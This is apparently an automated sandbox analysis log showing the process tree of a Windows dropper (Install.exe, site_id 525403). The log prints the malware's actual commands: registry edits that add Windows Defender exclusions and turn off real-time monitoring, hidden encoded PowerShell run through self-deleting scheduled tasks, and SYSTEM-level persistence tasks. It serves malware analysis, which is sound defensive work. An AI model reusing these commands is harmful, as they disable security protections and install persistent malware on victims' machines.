33 PID 2044 wrote to memory of 268 2044 Install.exe 33 PID 2044 wrote to memory of 268 2044 Install.exe 33 PID 2044 wrote to memory of 268 2044 Install.exe 33 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 268 wrote to memory of 432 268 forfiles.exe 36 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1136 wrote to memory of 1120 1136 forfiles.exe 35 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 1120 wrote to memory of 536 1120 cmd.exe 37 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 432 wrote to memory of 1784 432 cmd.exe 38 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 1120 wrote to memory of 704 1120 cmd.exe 40 PID 432 wrote to memory of 1580 432 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\7zSFBEC.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\7zS446.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:536
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:704
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:432 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1580
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjKyctEUn" /SC once /ST 15:38:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjKyctEUn"4⤵PID:1872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjKyctEUn"4⤵PID:2008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNmmFmDfYxkEbHwDyL" /SC once /ST 21:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\WKxmouy.exe\" 5L /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1252
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {FE8BA8C8-D809-414A-B129-54F65FA66ADF} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵PID:540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:872
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:788
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:332
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1808
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1720
-
C:\Windows\system32\taskeng.exetaskeng.exe {D9548BC4-5D20-4E04-BAB6-1EDA8B6D9CF2} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\WKxmouy.exeC:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\WKxmouy.exe 5L /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:536 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjFPLpYOG" /SC once /ST 11:04:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjFPLpYOG"3⤵PID:704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjFPLpYOG"3⤵PID:1008
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1780
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1184
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIbnCAvuX" /SC once /ST 11:57:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIbnCAvuX"3⤵PID:572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIbnCAvuX"3⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:323⤵PID:1408
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:643⤵PID:1528
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:323⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:643⤵PID:1628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\rxGmlNEdrxIyNebK\OKoGVfBb\eVEdgxeuLGyrARWz.wsf"3⤵PID:1976
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\rxGmlNEdrxIyNebK\OKoGVfBb\eVEdgxeuLGyrARWz.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1052 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:324⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:324⤵PID:548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:644⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:324⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:644⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:324⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:644⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:324⤵PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:644⤵PID:296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:324⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:644⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:644⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:644⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵PID:1780
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXiTQJNvZ" /SC once /ST 12:27:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXiTQJNvZ"3⤵PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXiTQJNvZ"3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1048
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1560
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CXoLteMjLNFiDzwgz" /SC once /ST 17:38:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rxGmlNEdrxIyNebK\vYUSkvZZxmbwyEr\xHZNvQg.exe\" co /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CXoLteMjLNFiDzwgz"3⤵PID:2000
-
-
-
C:\Windows\Temp\rxGmlNEdrxIyNebK\vYUSkvZZxmbwyEr\xHZNvQg.exeC:\Windows\Temp\rxGmlNEdrxIyNebK\vYUSkvZZxmbwyEr\xHZNvQg.exe co /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1860 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNmmFmDfYxkEbHwDyL"3⤵PID:472
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:928
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\sVKkdmDjU\BoLWlc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qryHMmQcYEgLlBC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qryHMmQcYEgLlBC2" /F /xml "C:\Program Files (x86)\sVKkdmDjU\PrunerE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qryHMmQcYEgLlBC"3⤵PID:1004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qryHMmQcYEgLlBC"3⤵PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FSGWlFXiGyxeqN" /F /xml "C:\Program Files (x86)\ZbDVoFOXNENU2\ADlLMVt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TnCImqpKohWXw2" /F /xml "C:\ProgramData\qZroPUUiMzyEdOVB\lEqMxpO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZASwyFgQZKHRrMOFZ2" /F /xml "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\gYYCjto.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YLAVRIYeZlKSGLryrkX2" /F /xml "C:\Program Files (x86)\oEaTcchOPpGVC\JjpmzGh.xml" /RU "SYSTEM"3⤵
